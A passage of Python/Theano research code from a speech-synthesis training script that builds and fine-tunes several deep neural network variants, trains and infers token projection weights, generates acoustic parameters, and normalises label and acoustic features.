hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'TPDNN':
dnn_model = TokenProjectionDNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation,
projection_insize=projection_insize, projection_outsize=projection_outsize,
expand_by_minibatch=expand_by_minibatch, initial_projection_distrib=initial_projection_distrib)
train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
dnn_model.build_finetune_functions(
(train_set_x, train_set_x_proj, train_set_y),
(valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
elif model_type == 'SDAE':
##basic model is ready.
##if corruption levels is set to zero. it becomes normal autoencoder
dnn_model = StackedDenoiseAutoEncoder(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes)
if do_pretraining:
pretraining_fn = dnn_model.pretraining_functions(pretrain_set_x, batch_size)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'MSDNN': ##model is ready, but the hyper-parameters are not optimised.
dnn_model = MultiStreamDNN(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
elif model_type == 'MSDNN_GV': ## not fully ready
dnn_model = MultiStreamDNNGv(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
else:
logger.critical('%s type NN model is not supported!' %(model_type))
raise
## if pretraining is supported in one model, add the switch here
## be careful to use autoencoder for pretraining here:
## for SDAE, currently only sigmoid function is supported in the hidden layers, as our input is scaled to [0, 1]
## however, tanh works better and converge fast in finetuning
##
## Will extend this soon...
if do_pretraining and model_type == 'SDAE':
logger.info('pretraining the %s model' %(model_type))
corruption_level = 0.0
## in SDAE we do layer-wise pretraining using autoencoders
for i in range(dnn_model.n_layers):
for epoch in range(pretraining_epochs):
sub_start_time = time.clock()
pretrain_loss = []
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_y = train_data_reader.load_next_partition()
pretrain_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
n_train_batches = pretrain_set_x.get_value().shape[0] / batch_size
for batch_index in range(n_train_batches):
pretrain_loss.append(pretraining_fn[i](index=batch_index,
corruption=corruption_level,
learning_rate=pretraining_lr))
sub_end_time = time.clock()
logger.info('Pre-training layer %i, epoch %d, cost %s, time spent%.2f' % (i+1, epoch+1, numpy.mean(pretrain_loss), (sub_end_time - sub_start_time)))
train_data_reader.reset()
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.clock()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
previous_finetune_lr = finetune_lr
dnn_model.zero_projection_weights()
while (epoch < training_epochs):
epoch = epoch + 1
current_momentum = momentum
current_finetune_lr = finetune_lr
if epoch <= warmup_epoch:
current_finetune_lr = finetune_lr
current_momentum = warmup_momentum
else:
current_finetune_lr = previous_finetune_lr * 0.5
previous_finetune_lr = current_finetune_lr
train_error = []
sub_start_time = time.clock()
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
train_set_x_proj.set_value(numpy.asarray(temp_train_set_x_proj, dtype=proj_type), borrow=True)
train_set_y.set_value(numpy.asarray(temp_train_set_y, dtype=theano.config.floatX), borrow=True)
n_train_batches = train_set_x.get_value().shape[0] / batch_size
logger.debug('this partition: %d frames (divided into %d batches of size %d)' %(train_set_x.get_value(borrow=True).shape[0], n_train_batches, batch_size) )
for minibatch_index in range(n_train_batches):
this_train_error = train_subword_fn(minibatch_index, current_finetune_lr, current_momentum)
train_error.append(this_train_error)
if numpy.isnan(this_train_error):
logger.warning('training error over minibatch %d of %d was %s' % (minibatch_index+1,n_train_batches,this_train_error) )
train_data_reader.reset()
## osw -- getting validation error from a forward pass in a single batch
## exausts memory when using 20k projected vocab -- also use minibatches
logger.debug('calculating validation loss')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] / batch_size
for minibatch_index in range(n_valid_batches):
v_loss = valid_score_i(minibatch_index)
valid_error.append(v_loss)
this_validation_loss = numpy.mean(valid_error)
# this has a possible bias if the minibatches were not all of identical size
# but it should not be siginficant if minibatches are small
this_train_valid_loss = numpy.mean(train_error)
sub_end_time = time.clock()
loss_difference = this_validation_loss - previous_loss
logger.info('BASIC epoch %i, validation error %f, train error %f time spent %.2f' %(epoch, this_validation_loss, this_train_valid_loss, (sub_end_time - sub_start_time)))
if plot:
plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
plotlogger.save_plot('training convergence',title='Progress of training and validation error',xlabel='epochs',ylabel='error')
if this_validation_loss < best_validation_loss:
best_dnn_model = dnn_model
best_validation_loss = this_validation_loss
logger.debug('validation loss decreased, so saving model')
early_stop = 0
else:
logger.debug('validation loss did not improve')
dbn = best_dnn_model
early_stop += 1
if early_stop > early_stop_epoch:
# too many consecutive epochs without surpassing the best model
logger.debug('stopping early')
break
if math.isnan(this_validation_loss):
break
previous_loss = this_validation_loss
### Save projection values:
if cfg.hyper_params['model_type'] == 'TPDNN':
if not os.path.isdir(cfg.projection_weights_output_dir):
os.mkdir(cfg.projection_weights_output_dir)
weights = dnn_model.get_projection_weights()
fname = os.path.join(cfg.projection_weights_output_dir, 'proj_BASIC_epoch_%s'%(epoch))
numpy.savetxt(fname, weights)
end_time = time.clock()
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
if plot:
plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
### ========== now train the word residual ============
def train_DNN_with_projections(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False):
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
private_l2_reg = float(hyper_params['private_l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layers_sizes = hyper_params['hidden_layers_sizes']
stream_weights = hyper_params['stream_weights']
private_hidden_sizes = hyper_params['private_hidden_sizes']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
stream_lr_weights = hyper_params['stream_lr_weights']
use_private_hidden = hyper_params['use_private_hidden']
model_type = hyper_params['model_type']
index_to_project = hyper_params['index_to_project']
projection_insize = hyper_params['projection_insize']
projection_outsize = hyper_params['projection_outsize']
######### data providers ##########
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProviderWithProjectionIndex(x_file_list = train_x_file_list, y_file_list = train_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = True, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProviderWithProjectionIndex(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = False, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x, train_set_x_proj, train_set_y = shared_train_set_xy
shared_valid_set_xy, temp_valid_set_x, temp_valid_set_x_proj, temp_valid_set_y = valid_data_reader.load_next_partition_with_projection()
valid_set_x, valid_set_x_proj, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
####################################
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
############## load existing dnn #####
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
dnn_model.build_finetune_functions(
(train_set_x, train_set_x_proj, train_set_y),
(valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
####################################
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.clock()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
previous_finetune_lr = finetune_lr
dnn_model.initialise_projection_weights()
all_epochs = 20 ## 100 ## <-------- hard coded !!!!!!!!!!
current_finetune_lr = previous_finetune_lr = finetune_lr
warmup_epoch_2 = 10 # 10 ## <-------- hard coded !!!!!!!!!!
while (epoch < all_epochs):
epoch = epoch + 1
current_momentum = momentum
if epoch > warmup_epoch_2:
previous_finetune_lr = current_finetune_lr
current_finetune_lr = previous_finetune_lr * 0.5
train_error = []
sub_start_time = time.clock()
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
train_set_x_proj.set_value(numpy.asarray(temp_train_set_x_proj, dtype=proj_type), borrow=True)
train_set_y.set_value(numpy.asarray(temp_train_set_y, dtype=theano.config.floatX), borrow=True)
n_train_batches = train_set_x.get_value().shape[0] / batch_size
logger.debug('this partition: %d frames (divided into %d batches of size %d)' %(train_set_x.get_value(borrow=True).shape[0], n_train_batches, batch_size) )
for minibatch_index in range(n_train_batches):
this_train_error = train_word_fn(minibatch_index, current_finetune_lr, current_momentum)
train_error.append(this_train_error)
if numpy.isnan(this_train_error):
logger.warning('training error over minibatch %d of %d was %s' % (minibatch_index+1,n_train_batches,this_train_error) )
train_data_reader.reset()
### COULD REMOVE THIS LATER
## osw -- getting validation error from a forward pass in a single batch
## exausts memory when using 20k projected vocab -- also use minibatches
logger.debug('calculating validation loss')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] / batch_size
for minibatch_index in range(n_valid_batches):
v_loss = valid_score_i(minibatch_index)
valid_error.append(v_loss)
this_validation_loss = numpy.mean(valid_error)
# this has a possible bias if the minibatches were not all of identical size
# but it should not be siginficant if minibatches are small
this_train_valid_loss = numpy.mean(train_error)
# if plot:
# ## add dummy validation loss so that plot works:
# plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
# plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
#
sub_end_time = time.clock()
logger.info('TOKEN epoch %i, validation error %f, train error %f time spent %.2f' %(epoch, this_validation_loss, this_train_valid_loss, (sub_end_time - sub_start_time)))
if cfg.hyper_params['model_type'] == 'TPDNN':
if not os.path.isdir(cfg.projection_weights_output_dir):
os.mkdir(cfg.projection_weights_output_dir)
weights = dnn_model.get_projection_weights()
fname = os.path.join(cfg.projection_weights_output_dir, 'proj_TOKEN_epoch_%s'%(epoch))
numpy.savetxt(fname, weights)
best_dnn_model = dnn_model ## always update
end_time = time.clock()
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
# if plot:
# plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
#
### ========================================================
### ========== now infer word represntations for out-of-training (dev) data ============
#
# ### TEMP-- restarted!!! ### ~~~~~~~
# epoch = 50
# dnn_model = cPickle.load(open(nnets_file_name, 'rb'))
# train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
# dnn_model.build_finetune_functions(
# (train_set_x, train_set_x_proj, train_set_y),
# (valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
# this_train_valid_loss = 198.0 ## approx value
# ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def infer_projections(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False):
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
private_l2_reg = float(hyper_params['private_l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layers_sizes = hyper_params['hidden_layers_sizes']
stream_weights = hyper_params['stream_weights']
private_hidden_sizes = hyper_params['private_hidden_sizes']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
stream_lr_weights = hyper_params['stream_lr_weights']
use_private_hidden = hyper_params['use_private_hidden']
model_type = hyper_params['model_type']
index_to_project = hyper_params['index_to_project']
projection_insize = hyper_params['projection_insize']
projection_outsize = hyper_params['projection_outsize']
######### data providers ##########
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProviderWithProjectionIndex(x_file_list = train_x_file_list, y_file_list = train_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = True, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProviderWithProjectionIndex(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = False, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x, train_set_x_proj, train_set_y = shared_train_set_xy
shared_valid_set_xy, temp_valid_set_x, temp_valid_set_x_proj, temp_valid_set_y = valid_data_reader.load_next_partition_with_projection()
valid_set_x, valid_set_x_proj, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
####################################
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
############## load existing dnn #####
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
dnn_model.build_finetune_functions(
(train_set_x, train_set_x_proj, train_set_y),
(valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
####################################
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.clock()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
previous_finetune_lr = finetune_lr
logger.info('fine-tuning the %s model' %(model_type))
#dnn_model.initialise_projection_weights()
inference_epochs = 20 ## <-------- hard coded !!!!!!!!!!
current_finetune_lr = previous_finetune_lr = finetune_lr
warmup_epoch_3 = 10 # 10 ## <-------- hard coded !!!!!!!!!!
#warmup_epoch_3 = epoch + warmup_epoch_3
#inference_epochs += epoch
while (epoch < inference_epochs):
epoch = epoch + 1
current_momentum = momentum
if epoch > warmup_epoch_3:
previous_finetune_lr = current_finetune_lr
current_finetune_lr = previous_finetune_lr * 0.5
dev_error = []
sub_start_time = time.clock()
## osw -- inferring word reps on validation set in a forward pass in a single batch
## exausts memory when using 20k projected vocab -- also use minibatches
logger.debug('infer word representations for validation set')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] / batch_size
for minibatch_index in range(n_valid_batches):
v_loss = infer_projections_fn(minibatch_index, current_finetune_lr, current_momentum)
valid_error.append(v_loss)
this_validation_loss = numpy.mean(valid_error)
#valid_error = infer_projections_fn(current_finetune_lr, current_momentum)
#this_validation_loss = numpy.mean(valid_error)
# if plot:
# ## add dummy validation loss so that plot works:
# plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
# plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
#
sub_end_time = time.clock()
logger.info('INFERENCE epoch %i, validation error %f, time spent %.2f' %(epoch, this_validation_loss, (sub_end_time - sub_start_time)))
if cfg.hyper_params['model_type'] == 'TPDNN':
if not os.path.isdir(cfg.projection_weights_output_dir):
os.mkdir(cfg.projection_weights_output_dir)
weights = dnn_model.get_projection_weights()
fname = os.path.join(cfg.projection_weights_output_dir, 'proj_INFERENCE_epoch_%s'%(epoch))
numpy.savetxt(fname, weights)
best_dnn_model = dnn_model ## always update
end_time = time.clock()
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
# if plot:
# plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
#
### ========================================================
if cfg.hyper_params['model_type'] == 'TPDNN':
os.system('python %s %s'%('/afs/inf.ed.ac.uk/user/o/owatts/scripts_NEW/plot_weights_multiple_phases.py', cfg.projection_weights_output_dir))
return best_validation_loss
def dnn_generation(valid_file_list, nnets_file_name, n_ins, n_outs, out_file_list, cfg=None, use_word_projections=True):
logger = logging.getLogger("dnn_generation")
logger.debug('Starting dnn_generation')
plotlogger = logging.getLogger("plotting")
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
## 'remove' word representations by randomising them. As model is unpickled and
## no re-saved, this does not throw trained parameters away.
if not use_word_projections:
dnn_model.initialise_projection_weights()
# visualize_dnn(dbn)
file_number = len(valid_file_list)
for i in range(file_number):
logger.info('generating %4d of %4d: %s' % (i+1,file_number,valid_file_list[i]) )
fid_lab = open(valid_file_list[i], 'rb')
features = numpy.fromfile(fid_lab, dtype=numpy.float32)
fid_lab.close()
features = features[:(n_ins * (features.size / n_ins))]
features = features.reshape((-1, n_ins))
#features, features_proj = expand_projection_inputs(features, cfg.index_to_project, \
# cfg.projection_insize)
features, features_proj = get_unexpanded_projection_inputs(features, cfg.index_to_project, \
cfg.projection_insize)
#temp_set_x = features.tolist() ## osw - why list conversion necessary?
#print temp_set_x
test_set_x = theano.shared(numpy.asarray(features, dtype=theano.config.floatX))
test_set_x_proj = theano.shared(numpy.asarray(features_proj, dtype='int32'))
predicted_parameter = dnn_model.parameter_prediction(test_set_x=test_set_x, test_set_x_proj=test_set_x_proj)
# predicted_parameter = test_out()
### write to cmp file
predicted_parameter = numpy.array(predicted_parameter, 'float32')
temp_parameter = predicted_parameter
fid = open(out_file_list[i], 'wb')
predicted_parameter.tofile(fid)
logger.debug('saved to %s' % out_file_list[i])
fid.close()
##generate bottleneck layer as festures
def dnn_hidden_generation(valid_file_list, nnets_file_name, n_ins, n_outs, out_file_list):
logger = logging.getLogger("dnn_generation")
logger.debug('Starting dnn_generation')
plotlogger = logging.getLogger("plotting")
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
file_number = len(valid_file_list)
for i in range(file_number):
logger.info('generating %4d of %4d: %s' % (i+1,file_number,valid_file_list[i]) )
fid_lab = open(valid_file_list[i], 'rb')
features = numpy.fromfile(fid_lab, dtype=numpy.float32)
fid_lab.close()
features = features[:(n_ins * (features.size / n_ins))]
features = features.reshape((-1, n_ins))
temp_set_x = features.tolist()
test_set_x = theano.shared(numpy.asarray(temp_set_x, dtype=theano.config.floatX))
predicted_parameter = dnn_model.generate_top_hidden_layer(test_set_x=test_set_x)
### write to cmp file
predicted_parameter = numpy.array(predicted_parameter, 'float32')
temp_parameter = predicted_parameter
fid = open(out_file_list[i], 'wb')
predicted_parameter.tofile(fid)
logger.debug('saved to %s' % out_file_list[i])
fid.close()
def main_function(cfg):
# get a logger for this main function
logger = logging.getLogger("main")
# get another logger to handle plotting duties
plotlogger = logging.getLogger("plotting")
# later, we might do this via a handler that is created, attached and configured
# using the standard config mechanism of the logging module
# but for now we need to do it manually
plotlogger.set_plot_path(cfg.plot_dir)
#### parameter setting########
hidden_layers_sizes = cfg.hyper_params['hidden_layers_sizes']
####prepare environment
try:
file_id_list = read_file_list(cfg.file_id_scp)
logger.debug('Loaded file id list from %s' % cfg.file_id_scp)
except IOError:
# this means that open(...) threw an error
logger.critical('Could not load file id list from %s' % cfg.file_id_scp)
raise
###total file number including training, development, and testing
total_file_number = len(file_id_list)
data_dir = cfg.data_dir
nn_cmp_dir = os.path.join(data_dir, 'nn' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))
nn_cmp_norm_dir = os.path.join(data_dir, 'nn_norm' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))
model_dir = os.path.join(cfg.work_dir, 'nnets_model')
gen_dir = os.path.join(cfg.work_dir, 'gen')
in_file_list_dict = {}
for feature_name in list(cfg.in_dir_dict.keys()):
in_file_list_dict[feature_name] = prepare_file_path_list(file_id_list, cfg.in_dir_dict[feature_name], cfg.file_extension_dict[feature_name], False)
nn_cmp_file_list = prepare_file_path_list(file_id_list, nn_cmp_dir, cfg.cmp_ext)
nn_cmp_norm_file_list = prepare_file_path_list(file_id_list, nn_cmp_norm_dir, cfg.cmp_ext)
###normalisation information
norm_info_file = os.path.join(data_dir, 'norm_info' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim) + '_' + cfg.output_feature_normalisation + '.dat')
### normalise input full context label
# currently supporting two different forms of lingustic features
# later, we should generalise this
if cfg.label_style == 'HTS':
label_normaliser = HTSLabelNormalisation(question_file_name=cfg.question_file_name)
lab_dim = label_normaliser.dimension
logger.info('Input label dimension is %d' % lab_dim)
suffix=str(lab_dim)
# no longer supported - use new "composed" style labels instead
elif cfg.label_style == 'composed':
# label_normaliser = XMLLabelNormalisation(xpath_file_name=cfg.xpath_file_name)
suffix='composed'
if cfg.process_labels_in_work_dir:
label_data_dir = cfg.work_dir
else:
label_data_dir = data_dir
# the number can be removed
binary_label_dir = os.path.join(label_data_dir, 'binary_label_'+suffix)
nn_label_dir = os.path.join(label_data_dir, 'nn_no_silence_lab_'+suffix)
nn_label_norm_dir = os.path.join(label_data_dir, 'nn_no_silence_lab_norm_'+suffix)
# nn_label_norm_mvn_dir = os.path.join(data_dir, 'nn_no_silence_lab_norm_'+suffix)
in_label_align_file_list = prepare_file_path_list(file_id_list, cfg.in_label_align_dir, cfg.lab_ext, False)
binary_label_file_list = prepare_file_path_list(file_id_list, binary_label_dir, cfg.lab_ext)
nn_label_file_list = prepare_file_path_list(file_id_list, nn_label_dir, cfg.lab_ext)
nn_label_norm_file_list = prepare_file_path_list(file_id_list, nn_label_norm_dir, cfg.lab_ext)
# to do - sanity check the label dimension here?
min_max_normaliser = None
label_norm_file = 'label_norm_%s.dat' %(cfg.label_style)
label_norm_file = os.path.join(label_data_dir, label_norm_file)
if cfg.NORMLAB and (cfg.label_style == 'HTS'):
# simple HTS labels
logger.info('preparing label data (input) using standard HTS style labels')
label_normaliser.perform_normalisation(in_label_align_file_list, binary_label_file_list)
remover = SilenceRemover(n_cmp = lab_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(binary_label_file_list, in_label_align_file_list, nn_label_file_list)
min_max_normaliser = MinMaxNormalisation(feature_dimension = lab_dim, min_value = 0.01, max_value = 0.99)
###use only training data to find min-max information, then apply on the whole dataset
min_max_normaliser.find_min_max_values(nn_label_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_label_file_list, nn_label_norm_file_list)
if cfg.NORMLAB and (cfg.label_style == 'composed'):
# new flexible label preprocessor
logger.info('preparing label data (input) using "composed" style labels')
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
logger.info('Loaded label configuration')
# logger.info('%s' % label_composer.configuration.labels )
lab_dim=label_composer.compute_label_dimension()
logger.info('label dimension will be %d' % lab_dim)
if cfg.precompile_xpaths:
label_composer.precompile_xpaths()
# there are now a set of parallel input label files (e.g, one set of HTS and another set of Ossian trees)
# create all the lists of these, ready to pass to the label composer
in_label_align_file_list = {}
for label_style, label_style_required in label_composer.label_styles.items():
if label_style_required:
logger.info('labels of style %s are required - constructing file paths for them' % label_style)
if label_style == 'xpath':
in_label_align_file_list['xpath'] = prepare_file_path_list(file_id_list, cfg.xpath_label_align_dir, cfg.utt_ext, False)
elif label_style == 'hts':
in_label_align_file_list['hts'] = prepare_file_path_list(file_id_list, cfg.hts_label_align_dir, cfg.lab_ext, False)
else:
logger.critical('unsupported label style %s specified in label configuration' % label_style)
raise Exception
# now iterate through the files, one at a time, constructing the labels for them
num_files=len(file_id_list)
logger.info('the label styles required are %s' % label_composer.label_styles)
for i in range(num_files):
logger.info('making input label features for %4d of %4d' % (i+1,num_files))
# iterate through the required label styles and open each corresponding label file
# a dictionary of file descriptors, pointing at the required files
required_labels={}
for label_style, label_style_required in label_composer.label_styles.items():
# the files will be a parallel set of files for a single utterance
# e.g., the XML tree and an HTS label file
if label_style_required:
required_labels[label_style] = open(in_label_align_file_list[label_style][i] , 'r')
logger.debug(' opening label file %s' % in_label_align_file_list[label_style][i])
logger.debug('label styles with open files: %s' % required_labels)
label_composer.make_labels(required_labels,out_file_name=binary_label_file_list[i],fill_missing_values=cfg.fill_missing_values,iterate_over_frames=cfg.iterate_over_frames)
# now close all opened files
for fd in required_labels.values():
fd.close()
# silence removal
if cfg.remove_silence_using_binary_labels:
silence_feature = 0 ## use first feature in label -- hardcoded for now
logger.info('Silence removal from label using silence feature: %s'%(label_composer.configuration.labels[silence_feature]))
logger.info('Silence will be removed from CMP files in same way')
## Binary labels have 2 roles: both the thing trimmed and the instructions for trimming:
trim_silence(binary_label_file_list, nn_label_file_list, lab_dim, \
binary_label_file_list, lab_dim, silence_feature, percent_to_keep=5)
else:
logger.info('No silence removal done')
# start from the labels we have just produced, not trimmed versions
nn_label_file_list = binary_label_file_list
min_max_normaliser = MinMaxNormalisation(feature_dimension = lab_dim, min_value = 0.01, max_value = 0.99, exclude_columns=[cfg.index_to_project])
###use only training data to find min-max information, then apply on the whole dataset
min_max_normaliser.find_min_max_values(nn_label_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_label_file_list, nn_label_norm_file_list)
if min_max_normaliser != None:
### save label normalisation information for unseen testing labels
label_min_vector = min_max_normaliser.min_vector
label_max_vector = min_max_normaliser.max_vector
label_norm_info = numpy.concatenate((label_min_vector, label_max_vector), axis=0)
label_norm_info = numpy.array(label_norm_info, 'float32')
fid = open(label_norm_file, 'wb')
label_norm_info.tofile(fid)
fid.close()
logger.info('saved %s vectors to %s' %(label_min_vector.size, label_norm_file))
### make output acoustic data
if cfg.MAKECMP:
logger.info('creating acoustic (output) features')
delta_win = [-0.5, 0.0, 0.5]
acc_win = [1.0, -2.0, 1.0]
acoustic_worker = AcousticComposition(delta_win = delta_win, acc_win = acc_win)
acoustic_worker.prepare_nn_data(in_file_list_dict, nn_cmp_file_list, cfg.in_dimension_dict, cfg.out_dimension_dict)
if cfg.remove_silence_using_binary_labels:
## do this to get lab_dim:
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
silence_feature = 0 ## use first feature in label -- hardcoded for now
logger.info('Silence removal from CMP using binary label file')
## overwrite the untrimmed audio with the trimmed version:
trim_silence(nn_cmp_file_list, nn_cmp_file_list, cfg.cmp_dim, \
binary_label_file_list, lab_dim, silence_feature, percent_to_keep=5)
else: ## back off to previous method using HTS labels:
remover = SilenceRemover(n_cmp = cfg.cmp_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(nn_cmp_file_list, in_label_align_file_list, nn_cmp_file_list) # save to itself
### save acoustic normalisation information for normalising the features back
var_dir = os.path.join(data_dir, 'var')
if not os.path.exists(var_dir):
os.makedirs(var_dir)
var_file_dict = {}
for feature_name in list(cfg.out_dimension_dict.keys()):
var_file_dict[feature_name] = os.path.join(var_dir, feature_name + '_' + str(cfg.out_dimension_dict[feature_name]))
### normalise output acoustic data
if cfg.NORMCMP:
logger.info('normalising acoustic (output) features using method %s' % cfg.output_feature_normalisation)
cmp_norm_info = None
if cfg.output_feature_normalisation == 'MVN':
normaliser = MeanVarianceNorm(feature_dimension=cfg.cmp_dim)
###calculate mean and std vectors on the training data, and apply on the whole dataset
global_mean_vector = normaliser.compute_mean(nn_cmp_file_list[0:cfg.train_file_number], 0, cfg.cmp_dim)
global_std_vector = normaliser.compute_std(nn_cmp_file_list[0:cfg.train_file_number], global_mean_vector, 0, cfg.cmp_dim)
